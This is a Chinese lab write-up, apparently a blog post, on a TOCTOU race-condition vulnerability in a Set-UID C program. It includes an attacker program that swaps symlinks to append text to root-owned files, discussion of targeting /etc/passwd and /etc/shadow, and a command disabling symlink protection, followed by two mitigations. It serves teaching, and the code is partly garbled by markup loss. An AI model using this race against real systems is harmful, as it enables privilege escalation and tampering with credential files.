竞态条件漏洞实验(示例代码)
年少无知，后悔已迟
竞态条件漏洞实验
竞态条件是指多个线程同时访问或者操作同一块数据，运行的结果依赖于不同线程访问数据的顺序。如果一个拥有root权限的程序存在竞态条件漏洞的话，攻击者可以通过运行一个平行线程与漏洞程序竞争，以此改变该程序的行为。
利用vulp.c中的竞态条件漏洞可以做很多事情。其中一种是利用漏洞在 /etc/passwd 和 /etc/shadow 后追加信息。这两个文件是unix做用户授权用的，攻击者有可能利用这点创建用户，甚至是超级用户。
可以通过调用c函数symlink()创建连接。因为linux不允许创建已经存在的连接，我们需要先删除旧链接，下面的C代码演示如何移除一个旧链接并使/tmp/XYZ指向/etc/passwd:
unlink("/tmp/XYZ");
symlink("/etc/passwd","/tmp/XYZ");
或者使用命令ln -sf 创建链接，f选项意味着覆盖原链接。ln命令的内部实现本身就包含上文的两个函数。
最重要的一步（创建指向目标文件的链接）发生在调用access函数与fopen函数之间。我们无法更改漏洞程序，那么唯一能做的就是运行攻击程序，希望链接操作能在那段时间内发生。如果间隙很小的话，攻击成功率就比较渺茫了。所以你需要写程序自动化你的攻击流程，反复进行攻击，为避免手动输入vulp程序。你可以使用命令./vulp & FILE(FILE是你 scanf 的文本文件)。
普通用户无法访问shadow文件中的内容，那该如何知道文件是否被更改呢？可以看时间戳！而且一旦得知攻击成功就停止攻击这样做会更好一点，以下shell命令检查文件时间戳是否更改：
#注意`不是单引号
old=`ls -l /etc/shadow`
new=`ls -l /etc/shadow`
while [ "$old" = "$new" ]
new=`ls -l /etc/shadow`
echo "STOP... The shadow file has been changed"
由于本实验环境开启了针对竞态条件攻击的保护，所以需要先关掉保护。该选项意味着全域可写sticky位开启的文件夹是不能作为链接目标所在文件夹的。
$ echo 0 & /proc/sys/fs/protected_symlinks
下面是vulp.c的代码，看似无害，实则包藏祸心：
#include &stdio.h&
#include &string.h&
#include &unistd.h&
#define DELAY 10000
int main()
char * fn = "/tmp/XYZ";
char buffer[60];
/* get user input */
scanf("%50s", buffer );
if(!access(fn, W_OK)){
/*为了增加实验成功率增加的延迟*/
for(i=0; i & DELAY; i++){
int a = i^2;
fp = fopen(fn, "a+");
", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
else printf("No permission
这是一个Set-UID程序(root所有) 它将用户输入的字符串添加到文件 /tmp/XYZ 后，access()会检查用户是否具备访问资源的权限，也就是说该函数检查real id而不是effective id。
这个程序第一眼看上去没有任何问题，但是这里有一个竞态条件漏洞。由于检查（access）与访问（fopen）之间存在时间间隙，所以检查与访问的就有可能不是同一个文件，即使它们的名字相同。如果一个恶意攻击者可以创建一个/tmp/XYZ/链接指向/etc/shadow,输入的字符串就会追加到shadow文件中去。
现在我们来重写拥有者为root的任意文件：
首先如下图创建几个文件，注意这几个文件的权限。在append_text文件中加入你想要在root_file里加入的任意内容。编译漏洞程序代码并将其设为SET-UID文件。
这里面append_text文件时输入文件，root_file是目标文件，vulp是漏洞文件。
然后是检查时间戳的脚本check.sh，将运行vulp的命令加入其中，然后使用chmod u+x check.sh命令给脚本运行权限。
attacker.c是攻击代码：
int main()
system("ln -sf /home/seed/race/tmp_file /tmp/XYZ");
system("ln -sf /home/seed/race/root_file /tmp/XYZ");
攻击前，文件append_text和root_file中内容：
攻击时，先运行attacker，再运行check.sh：
然后再次查看root_file中的内容：
实验结果和应该的有所差距，具体原因尚未找出。但是从文件内容来看，所有权是root的文件内容确实被修改了。
保护机制A：重复
想要避免竞态条件的发生并不轻松，因为先检查再访问这个模式在很多程序中都是需要的。但是我们可以增加更多的竞态条件，这样就能减小攻击者攻击成功的概率了。该机制的基础思想是重复access和fopen函数的次数。如我们把漏洞程序修改成如下：
#include &stdio.h&
#include &unistd.h&
#define DELAY 10000
int main()
char * fn = "/tmp/XYZ";
char buffer[60];
/* get user input */
scanf("%50s", buffer );
if(!access(fn, W_OK)){
if(!access(fn, W_OK)){
/*嵌套n层*/
fp = fopen(fn, "a+");
", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
else printf("No permission
else printf("No permission
保护机制B：最小权限原则
该程序的根本问题就在于它违反了最小权限原则，程序员认识到运行这个程序的用户可能权利过大，所以引入access函数进行限制，但也同时引入了竞态条件的隐患。
更好的方法是使用seteuid系统调用暂时禁止root权限，当需要时再恢复。
#include &stdio.h&
#include &unistd.h&
#define DELAY 10000
int main()
char * fn = "/tmp/XYZ";
char buffer[60];
/* get user input */
scanf("%50s", buffer );
uid_t euid = geteuid();
seteuid(getuid());
for (i=0; i & DELAY; i++){
int a = i^2;
if (fp = fopen(fn, "a+")){
", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
else printf("No permission
seteuid(euid);
刚开始时候实验老是权限限制，后来发现/tmp/XYZ是root持有的文件，原来是之前先运行了vplu，vulp发现不存在/tmp/XYZ这个文件，就会以root权限创建这个文件，那么我们的攻击程序就不能对文件进行修改，导致攻击失败。所以攻击时要首先运行attacker，再运行check.sh。
刚开始实验时候，输入是“hello Chengwenwen”，但是发现每次向root_file文件中写入的字符只有hello，空格和之后的内容没有了，经过向老师询问才发现输入文件的字符串（即append_text中内容）不能有空格。后来经过在网上查询资料才知道，scanf()输入时候遇到空格会从空格处折断，不再读取后面的内容。
操作系统进程调度的本质是时间片轮转，一个进程可能在任何时刻被调度，转而运行第二个程序。竞争条件漏洞就是因为这种调度出现的漏洞。当一个程序本应连续执行的两步被打断，切换到另一进程时，这个进程可能对原来进程需要的资源进行修改，导致原程序的执行发生错误。本次实验中修改的就是程序操作文件指向的对象。
本文 首次收藏人是e_calm
如果对你有用，别忘了收藏到你的IT知识库哦^_^
最新回复 (0)
作者最近主题：如何利用“竞态条件”进行攻击的相关文章推荐 -
- ITeye专栏频道
相关知识库：
《高质量程序设计艺术》样章连载——3.3 竞态条件
原书名：Code Quality: The Open Source Perspective
&o:p&&/o:p&
深入剖析著名开源软件的质量问题&o:p&&/o:p&
全面阐述C、C++和Java代码中的常见编程错误&o:p&&/o:p&
[原创]Lucene-2.0学习文档
作者：Javafish(likunkun)
Email:javafish@sunxin.org
Lucene是apache组织的一个用java实现全文搜索引擎的开源项目。
其功能非常的强大，api也很简单。总得来说用Lucene来进行建立
和搜索和操作数据库是差不多的(有点像)，Document可以看作是
数据库的一行记录，Field可以看作是数据库的字 ...
1. FCKeditor 介绍
FCKeditor 这个开源的HTML 文本编辑器可以让web 程序拥有如MS Word 这样强大的编辑功
能.FCKeditor 支持当前流行的浏览器如IE 5.5+, Firefox 1.0+, Mozilla 1.3+与Netscape 7+等。FCKeditor官司方网址：http://www.fckeditor.net/
FCKeditor在线DEMO：ht ...
Prototype.AjaxRequest的调用堆栈重写问题&o:p&&/o:p&
作者：cleverpig&o:p&&/o:p&
&o:p& &/o:p&
由于调用AjaxRequest类进行XMLHTTPRequest操作时，this引用（指向当前function所在的对象）会出现了call stack问题，从而指向当前的 ...
随着SOA的流行，webservice开发也变得相当的热门。许多企业都将自己的网站迁移到soa的架构。今天我们来一起体验一下通过axis来创建、发布和调用webservice的过程。如果大家不太了解SOA请访问下面网址（http://www-/cn/software/rational/solution/tech/soa_design.shtml）
在开始之前我默 ...
JEECG（J2EE Code Generation） 是一款基于代码生成器的智能开发平台，采用代码生成+手工MERGE半智能开发模式， 可以帮助解决Java项目60%的重复工作，让开发更多关注业务逻辑。既能快速提高开发效率，帮助公司节省人力成本，同时又不失扩展性和灵活性。
JEECG宗旨是：简单功能由代码生成器生成使用; 复杂业务采用表单自定义，业务流程使用工作流来实现、扩展出任务接口，供开发 ...
ToyBricks ToyBricks（积木）（以下简称ToyBricks）是基于面向积木方法论构建的、面向Java开发（尤其是RIA应用）的开源开发平台， 旨在提供给开发者一个简单易用、高效率、高产品质量、易扩展的开源平台，“像搭积木一样开发软件”。
ToyBricks解决了很多长期困扰Java开发者的问题，如：
1）开发所应用的“平台”都是拼凑而成而非真正意义上的整合解决方案 。
JessMA 是功能完备的高性能 Full-Stack Web 应用开发框架，内置可扩展的 MVC Web 基础架构和 DAO 数据库访问组件（内部已提供了 Hibernate、MyBatis 与 JDBC DAO 组件），集成了 Action 拦截、Form / Dao / Spring Bean 装配、国际化、文件上传下载和页面静态化等基础 Web 应用组件，提供高效灵活的纯 Jsp/Se ...
PrettyFaces: EL API访问PrettyContext 支持JSF 1.1 增强了错误页面和servlet重定向 PrettyFaces是一个JSF1.2和JSF2.0的扩展，用来创建便于书签收藏、漂亮的网址。 PrettyFaces优雅的解决了这个问题，包括诸如功能：网页装载行动，无缝的跟faces的导航整合，动态视图的ID分配和管理参数分析，无需配置，兼容其他JSF框架。Prett ...
《高质量程序设计艺术》样章连载——3.1
原书名：Code Quality: The Open Source Perspective
深入剖析著名开源软件的质量问题&o:p&&/o:p&
全面阐述C、C++和Java代码中的常见编程错误&o:p&&/o:p&
指导你 ...
《高质量程序设计艺术》样章连载——3.2 缓冲区溢出
&o:p& &/o:p&
原书名：Code Quality: The Open Source Perspective
&o:p&&/o:p&
深入剖析著名开源软件的质量问题&o:p&&/o:p&
全面阐述C、C++和Java代码中的 ...
《高质量程序设计艺术》样章连载——3.5 不可信输入
原书名：Code Quality: The Open Source Perspective
&o:p&&/o:p&
深入剖析著名开源软件的质量问题&o:p&&/o:p&
全面阐述C、C++和Java代码中的常见编程错误&o:p&&/o: ...
《高质量程序设计艺术》样章连载——3.4 问题API
原书名：Code Quality: The Open Source Perspective&o:p&&/o:p&
深入剖析著名开源软件的质量问题&o:p&&/o:p&
全面阐述C、C++和Java代码中的常见编程错误&o:p&&/o:p ...
请教一下各位: 试了一下spring2.5.6 MVC + hibernate3.3.2的annotation组合,在持久化实体时,没有报错,日志也显示调用到了相应的操作,但是数据库中却没有数据...,不知道是哪里有问题 ,代码如下: applicationContext.xml
&context:property-placeholder location=&classpath:j ...
&s:iterator id=&pjctapply& value=&#request['projectApply']&&
&tr bgcolor=&#FFCC66& height=&24&&
&td&&div align=&center&&&s ...
&%@ page contentType=&text/ charset=GBK& %&&%@ page import=&java.util.*&%&&%@ page import=&java.sql.*,db.*&%&&% //定义属性 String name=(String)sessio ...
异常信息： 17:11:13,028 ERROR [org.hibernate.LazyInitializationException] - &could not initialize proxy - the owning Session was closed&org.hibernate.LazyInitializationException: could not i ...
报的错误脚本： form.action=ecsideObj.DEFAULT_ACTION; 以下是我的web.xml文件： &?xml version=&1.0& encoding=&UTF-8&?&&web-app version=&2.4& xmlns=&/xml/ns/ ...
只弄了一部分，要下班了。改天再弄。
&!DOCTYPE html& &title&HTML5新增属性&/title& &section& &article& &header&&h1&autofoucs&/h1&&/header& &p& autofoucs可以对input(ty ...
OFBiz进阶--OFBiz标签之 [*Services.xml]-mililang介绍与分析(三)
Mililang标签:
&if/check-*&, 判断操作(Conditional (If) Operations)
标签规则: [simple-methods.xsd] 新版本还有 [simple-methods-v2.xsd]
&if& &conditi ...
jQuery Mobile使用指南 简介：jQuery Mobile框架可以轻松的帮助我们实现非常好看的、可跨设备的Web应用程序。我们将后续的介绍中向大家介绍大量的代码及实例。 jQuery一直以来都是非常流行的富客户端及Web应用程序开发中使用的JavaScript类库,然而一直以来它都是为桌面浏览器设计的，没有特别为移动应用程序设计。 jQuery Mobile是一个新的项目用来添补在移动设 ...
Solr 是一个可供企业使用的、基于 Lucene 的开箱即用的搜索服务器。对Lucene不熟？那么建议先看看下面两篇文档：&o:p&&/o:p& 实战Lucene，第 1 部分: 初识 Lucene：/developerworks/cn/java/j-lo-lucene1/&o:p&&/o:p& 用Lucene加速 ...
之前的JS慢慢积累下来慢慢也就自己完善了个,比之前的__init_xu 要减小的多,主要代码仅仅包括如下几个部分:
简单去除注释压缩后在 9K左右,基本都全了 呵呵,比如DOM操作
做了个简单UI开发设想... 名字暂定为 mgui,在global.js 中暂时就这些代码: (function() { /** * MGUI for Moogens is a simp ...
本章我们将会开发基于Struts2框架的登录程序.我们当前的程序不能通过数据库验证用户.相反我们是通过硬编码的形式在Action中验证的(用户名: Admin 密码: Admin)
程序是如何工作的 ：
1. 显示登录页面等待输入 2. 用户输入用户名和密码后点击&Login&按钮 3. 在Action类中用户校验得到了执行,如果用户在name/password字段输入Ad ...
HTML语言作为如今编程最为广泛的语言，具有易用、快捷、多浏览平台兼容等特点，但是随着时代的进步，HTML的标准却停滞不前，这一次还在不断开发中的HTML5标准的更新可以说给这门标记语言带来了新的生命力。本文将着重讨论HTML5中的Web Forms 2.0, 即表单的部分。表单是网页中常见的控件(集)。小到网站注册登录，大到一个企业的数据管理系统，都基本上有表单的身影。表单之所以如此重要，主要是因 ...